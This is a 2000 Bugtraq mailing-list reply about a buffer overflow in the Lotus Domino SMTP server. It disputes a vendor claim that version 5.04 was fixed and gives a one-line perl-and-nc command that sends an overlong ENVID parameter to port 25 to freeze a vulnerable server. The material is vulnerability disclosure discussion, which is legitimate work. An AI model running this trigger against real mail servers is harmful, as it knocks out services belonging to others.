[17518] in bugtraq
Re: [SAFER] Buffer overflow in Lotus Domino SMTP Server
daemon@ATHENA.MIT.EDU (Fyodor)
Mon Nov 6 13:30:23 2000
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.LNX.4.30.0011060306110.15947-100000@doit.scorpions.net>
Date: Mon, 6 Nov 2000 03:27:40 -0500
Reply-To: Fyodor <fygrave@SCORPIONS.NET>
From: Fyodor <fygrave@SCORPIONS.NET>
X-To: CaptainBig <captainbig@BIGFOOT.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <3A0619E6.A7B62EC0@bigfoot.com>
> However, Lotus Notes/Domino Release 5.0.4 QMR fix list indicates that
> the problem was already fixed in 5.04.
>
> See
> http://www.support.lotus.com/sims2.nsf/802ee480bdd32d0b852566fa005acf8d/191a4daad1890947852569580069a59d?OpenDocument&Highlight=2,ENVID
>
> and click on
> Mail Server - Router - SMTP
>
> The SPR# is CDOY4GFP35
>
> Are you sure 5.04 is affected? Or the technote is lying?
>
Well, at least eval. version for linux platform is vulnerable.
if you want to be confident whether it affects your server or not
here's a small hint to play around : :-)
perl -e 'print "ehlo foo\nmail from:blah@yahoo.com\nrcpt to:admin@localhost ENVID=", "A"x900;' | nc lotus.box 25
or something like that.. :)
if all your lotus services get frozen afterwards, you are vulnerable.
-Fyodor
